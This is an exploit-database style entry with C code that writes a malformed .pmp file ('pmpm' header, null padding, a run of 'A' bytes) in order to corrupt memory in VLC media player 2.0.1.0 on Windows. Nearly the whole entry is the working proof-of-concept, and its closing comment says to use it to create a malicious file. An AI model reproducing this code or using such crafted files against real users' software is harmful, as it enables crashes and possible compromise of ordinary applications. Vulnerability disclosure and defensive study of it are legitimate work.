# Exploit Title: VLC v. 2.0.1.0 .pmp Memory Corruption
# Date: 3/15/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
Tested on stable 2.0, 2.0.1.0 (newest release as of 3/15/2012), not working on 1.1.11
#include <stdio.h>
int main()
{
FILE *f;
int i;
f = fopen("dos.pmp", "w");
fputs("\x70\x6d\x70\x6d\x01", f);
for(i = 0; i < 9; i++)
{
fputc('\x00', f);
}
for(i = 0; i < 41; i++)
{
fputc('\x41', f);
}
fclose(f);
return 0;
}
//use code for creating malicious file, eventually explodes
